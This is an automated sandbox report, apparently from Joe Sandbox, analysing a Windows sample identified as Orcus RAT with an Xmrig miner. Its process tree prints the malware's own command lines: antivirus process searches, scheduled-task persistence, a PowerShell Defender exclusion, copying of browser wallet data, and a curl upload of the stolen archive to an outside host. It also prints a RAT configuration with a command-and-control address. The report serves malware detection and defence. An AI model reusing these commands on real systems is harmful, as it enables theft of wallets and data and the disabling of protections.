Edit tour
Windows
Analysis Report
File.exe
Overview
General Information
| Sample name: | File.exe |
| Analysis ID: | 1567582 |
| MD5: | 5eecc13df41c8e6967f8a3ecb1d0cda9 |
| SHA1: | 8ac9ce30344f976a09da51da509dee5d2b0e8723 |
| SHA256: | 6b8848b38b3e239a0df83efc456ad22bf5e59e7145b59d1f8e154881ebb9f8e3 |
| Tags: | exeuser-pr0xylife |
| Infos: |   |
 | |
Detection
Orcus, Xmrig
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected AntiVM3
Yara detected Orcus RAT
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Browser Data Stealing
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
File.exe (PID: 4296 cmdline: "C:\Users\ user\Deskt op\File.ex e" MD5: 5EECC13DF41C8E6967F8A3ECB1D0CDA9) 
cmd.exe (PID: 5200 cmdline: "C:\Window s\System32 \cmd.exe" /c copy Au dit Audit. cmd && Aud it.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
tasklist.exe (PID: 3024 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 6368 cmdline:
findstr /I "wrsa ops svc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 6240 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 3644 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 1104 cmdline:
cmd /c md 491505 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 1836 cmdline:
cmd /c cop y /b ..\De ntists + . .\Flavor + ..\Distur bed + ..\A rtistic + ..\Justice + ..\Proc eeds + ..\ Zip + ..\S oundtrack + ..\Reven ue B MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) 
Dr.com (PID: 1240 cmdline: Dr.com B MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11) - cmd.exe (PID: 7068 cmdline:
cmd /c sch tasks.exe /create /t n "West" / tr "wscrip t //B 'C:\ Users\user \AppData\L ocal\Creat ivePixel T ech\Apollo Pro.js'" / sc daily / mo 1 /ri 3 /du 23:57 /F /RL HI GHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2628 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 4048 cmdline:
schtasks.e xe /create /tn "West " /tr "wsc ript //B ' C:\Users\u ser\AppDat a\Local\Cr eativePixe l Tech\Apo lloPro.js' " /sc dail y /mo 1 /r i 3 /du 23 :57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965) - schtasks.exe (PID: 3876 cmdline:
schtasks.e xe /create /tn "Apol loPro" /tr "wscript //B 'C:\Us ers\user\A ppData\Loc al\Creativ ePixel Tec h\ApolloPr o.js'" /sc onlogon / F /RL HIGH EST MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 5848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RegAsm.exe (PID: 5892 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\491505\ RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13) - cmd.exe (PID: 3824 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\wall etstealer. bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - xcopy.exe (PID: 3908 cmdline:
xcopy /E / I "C:\User s\user\App Data\Local \Microsoft \Edge\User Data\Defa ult\Local Extension Settings\* " "C:\User s\user~1\A ppData\Loc al\Temp\Ar chiveConte nts\Edge\" MD5: 7E9B7CE496D09F70C072930940F9F02C) - cmd.exe (PID: 1664 cmdline:
C:\Windows \system32\ cmd.exe /c curl -s h ttps://api .ipify.org MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - curl.exe (PID: 5732 cmdline:
curl -s ht tps://api. ipify.org MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) 
powershell.exe (PID: 5360 cmdline: powershell -command "Compress- Archive -P ath 'C:\Us ers\user~1 \AppData\L ocal\Temp\ ArchiveCon tents\*' - Destinatio nPath 'C:\ Users\user ~1\AppData \Local\Tem p\N_user_8 .46.123.22 8.zip'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 6124 cmdline:
C:\Windows \system32\ cmd.exe /c curl -F " file=@C:\U sers\user~ 1\AppData\ Local\Temp \N_user_8. 46.123.228 .zip" "htt ps://cdn-d ownloads-n ow.xyz/fil es/upload. php" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - curl.exe (PID: 4560 cmdline:
curl -F "f ile=@C:\Us ers\user~1 \AppData\L ocal\Temp\ N_user_8.4 6.123.228. zip" "http s://cdn-do wnloads-no w.xyz/file s/upload.p hp" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - COMSurrogate.exe (PID: 5980 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\COMSur rogate.exe " MD5: 77334F046A50530CDC6E585E59165264) - cmd.exe (PID: 4640 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\ex.b at" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - net.exe (PID: 60 cmdline:
net sessio n MD5: 31890A7DE89936F922D44D677F681A7F) - net1.exe (PID: 4104 cmdline:
C:\Windows \system32\ net1 sessi on MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1) - powershell.exe (PID: 644 cmdline:
powershell -WindowSt yle Hidden -Command "Add-MpPre ference -E xclusionPa th 'C:\Use rs\user\Ap pData\Loca l\asm'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 4208 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\runs teal.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6624 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - smartscreen.exe (PID: 6560 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\smarts creen.exe" MD5: 1FED66D1F6B85BDA20FE0403CA01C9BD) - choice.exe (PID: 5800 cmdline:
choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
wscript.exe (PID: 6912 cmdline: C:\Windows \system32\ wscript.EX E //B "C:\ Users\user \AppData\L ocal\Creat ivePixel T ech\Apollo Pro.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - ApolloPro.scr (PID: 3024 cmdline:
"C:\Users\ user\AppDa ta\Local\C reativePix el Tech\Ap olloPro.sc r" "C:\Use rs\user\Ap pData\Loca l\Creative Pixel Tech \E" MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
- COMSurrogate.exe (PID: 896 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\COMSur rogate.exe " MD5: 77334F046A50530CDC6E585E59165264)
- smartscreen.exe (PID: 6504 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\smarts creen.exe" MD5: 1FED66D1F6B85BDA20FE0403CA01C9BD)
- COMSurrogate.exe (PID: 2512 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\COMSur rogate.exe " MD5: 77334F046A50530CDC6E585E59165264)
- smartscreen.exe (PID: 4896 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\smarts creen.exe" MD5: 1FED66D1F6B85BDA20FE0403CA01C9BD)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Orcus RAT | Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
{"AutostartBuilderProperty": {"AutostartMethod": "Disable", "TaskSchedulerTaskName": "Orcus", "TaskHighestPrivileges": "true", "RegistryHiddenStart": "true", "RegistryKeyName": "Orcus", "TryAllAutostartMethodsOnFail": "true"}, "ChangeAssemblyInformationBuilderProperty": {"ChangeAssemblyInformation": "false", "AssemblyTitle": null, "AssemblyDescription": null, "AssemblyCompanyName": null, "AssemblyProductName": null, "AssemblyCopyright": null, "AssemblyTrademarks": null, "AssemblyProductVersion": "1.0.0.0", "AssemblyFileVersion": "1.0.0.0"}, "ChangeCreationDateBuilderProperty": {"IsEnabled": "false", "NewCreationDate": "2024-11-27T14:29:12"}, "ChangeIconBuilderProperty": {"ChangeIcon": "false", "IconPath": null}, "ClientTagBuilderProperty": {"ClientTag": null}, "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "45.74.38.211", "Port": "4782"}]}, "DataFolderBuilderProperty": {"Path": "%appdata%\\Orcus"}, "DefaultPrivilegesBuilderProperty": {"RequireAdministratorRights": "false"}, "DisableInstallationPromptBuilderProperty": {"IsDisabled": "true"}, "FrameworkVersionBuilderProperty": {"FrameworkVersion": "NET45"}, "HideFileBuilderProperty": {"HideFile": "false"}, "InstallationLocationBuilderProperty": {"Path": "%programfiles%\\Orcus\\Orcus.exe"}, "InstallBuilderProperty": {"Install": "false"}, "KeyloggerBuilderProperty": {"IsEnabled": "false"}, "MutexBuilderProperty": {"Mutex": "7a9c0f279c464958aebbd585f20f1cf2"}, "ProxyBuilderProperty": {"ProxyOption": "None", "ProxyAddress": null, "ProxyPort": "1080", "ProxyType": "2"}, "ReconnectDelayProperty": {"Delay": "10000"}, "RequireAdministratorPrivilegesInstallerBuilderProperty": {"RequireAdministratorPrivileges": "true"}, "RespawnTaskBuilderProperty": {"IsEnabled": "false", "TaskName": "Orcus Respawner"}, "ServiceBuilderProperty": {"Install": "false"}, "SetRunProgramAsAdminFlagBuilderProperty": {"SetFlag": "false"}, "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "OrcusWatchdog.exe", "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
| |
| Click to see the 2 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| Click to see the 36 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| Click to see the 14 entries | ||||
System Summary |   |
|---|
| Source: | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): | ||
| Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Jonathan Cheong, oscd.community: | ||
| Source: | Author: Jonathan Cheong, oscd.community: | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems), frack113: | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: frack113: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: frack113, Nasreddine Bencherchali: | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Author: Joe Security: | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira: | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
Bitcoin Miner | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Code function: | 0_2_00406301 | |
| Source: | Code function: | 0_2_00406CC7 | |
| Source: | Code function: | 24_2_00814005 | |
| Source: | Code function: | 24_2_0081C2FF | |
| Source: | Code function: | 24_2_0081494A | |
| Source: | Code function: | 24_2_0081CD9F | |
| Source: | Code function: | 24_2_0081CD14 | |
| Source: | Code function: | 24_2_0081F5D8 | |
| Source: | Code function: | 24_2_0081F735 | |
| Source: | Code function: | 24_2_0081FA36 | |
| Source: | Code function: | 24_2_00813CE2 | |
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | ASN Name: | ||
| Source: | Code function: | 24_2_008229BA | |
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Code function: | 0_2_004050F9 | |
| Source: | Code function: | 24_2_00824830 | |
| Source: | Code function: | 24_2_00824632 | |
| Source: | Code function: | 0_2_004044D1 | |
| Source: | Window created: | ||
| Source: | Window created: | ||
| Source: | Window created: | ||
| Source: | Code function: | 24_2_0083D164 | |
Spam, unwanted Advertisements and Ransom Demands | |
|---|
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
Operating System Destruction | |
|---|
| Source: | Process information set: | Jump to behavior | ||
System Summary | |
|---|
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | COM Object queried: | Jump to behavior | ||
| Source: | Process created: | ||
| Source: | Process Stats: | ||
| Source: | Code function: | 24_2_008142D5 | |
| Source: | Code function: | 24_2_00808F2E | |
| Source: | Code function: | 0_2_004038AF | |
| Source: | Code function: | 24_2_00815778 | |
| Source: | File created: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Code function: | 0_2_0040737E | |
| Source: | Code function: | 0_2_00406EFE | |
| Source: | Code function: | 0_2_004079A2 | |
| Source: | Code function: | 0_2_004049A8 | |
| Source: | Code function: | 24_2_007BB020 | |
| Source: | Code function: | 24_2_007B94E0 | |
| Source: | Code function: | 24_2_007B9C80 | |
| Source: | Code function: | 24_2_007D23F5 | |
| Source: | Code function: | 24_2_00838400 | |
| Source: | Code function: | 24_2_007E6502 | |
| Source: | Code function: | 24_2_007E265E | |
| Source: | Code function: | 24_2_007BE6F0 | |
| Source: | Code function: | 24_2_007D282A | |
| Source: | Code function: | 24_2_007E89BF | |
| Source: | Code function: | 24_2_007E6A74 | |
| Source: | Code function: | 24_2_00830A3A | |
| Source: | Code function: | 24_2_007C0BE0 | |
| Source: | Code function: | 24_2_007DCD51 | |
| Source: | Code function: | 24_2_0080EDB2 | |
| Source: | Code function: | 24_2_00830EB7 | |
| Source: | Code function: | 24_2_00818E44 | |
| Source: | Code function: | 24_2_007E6FE6 | |
| Source: | Code function: | 24_2_007D33B7 | |
| Source: | Code function: | 24_2_007CD45D | |
| Source: | Code function: | 24_2_007DF409 | |
| Source: | Code function: | 24_2_007B1663 | |
| Source: | Code function: | 24_2_007CF628 | |
| Source: | Code function: | 24_2_007D16B4 | |
| Source: | Code function: | 24_2_007BF6A0 | |
| Source: | Code function: | 24_2_007D78C3 | |
| Source: | Code function: | 24_2_007D1BA8 | |
| Source: | Code function: | 24_2_007DDBA5 | |
| Source: | Code function: | 24_2_007E9CE5 | |
| Source: | Code function: | 24_2_007CDD28 | |
| Source: | Code function: | 24_2_007DBFD6 | |
| Source: | Code function: | 24_2_007D1FC0 | |
| Source: | Code function: | 29_2_0183A032 | |
| Source: | Code function: | 29_2_01838400 | |
| Source: | Code function: | 29_2_01839310 | |
| Source: | Code function: | 29_2_078AB648 | |
| Source: | Code function: | 29_2_078ABF18 | |
| Source: | Code function: | 29_2_078A3860 | |
| Source: | Code function: | 29_2_078AB300 | |
| Source: | Code function: | 29_2_078FB408 | |
| Source: | Code function: | 29_2_078FD450 | |
| Source: | Code function: | 29_2_078F9260 | |
| Source: | Code function: | 29_2_078FD010 | |
| Source: | Code function: | 29_2_078F8738 | |
| Source: | Code function: | 29_2_078FD888 | |
| Source: | Code function: | 29_2_079E0520 | |
| Source: | Code function: | 29_2_079E8150 | |
| Source: | Code function: | 29_2_079E8141 | |
| Source: | Code function: | 29_2_079E18D0 | |
| Source: | Code function: | 29_2_079E18C1 | |
| Source: | Code function: | 29_2_07A2B4AC | |
| Source: | Code function: | 29_2_07A27050 | |
| Source: | Code function: | 29_2_07A268DA | |
| Source: | Code function: | 29_2_07A2B4AC | |
| Source: | Code function: | 29_2_07A2B4AC | |
| Source: | Code function: | 29_2_07A2D289 | |
| Source: | Code function: | 29_2_07A2D298 | |
| Source: | Code function: | 32_2_00007FFAAC3E0F35 | |
| Source: | Dropped File: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Static PE information: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Matched rule: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Cryptographic APIs: | ||
| Source: | Cryptographic APIs: | ||
| Source: | Task registration methods: | ||
| Source: | Base64 encoded string: | ||
| Source: | Base64 encoded string: | ||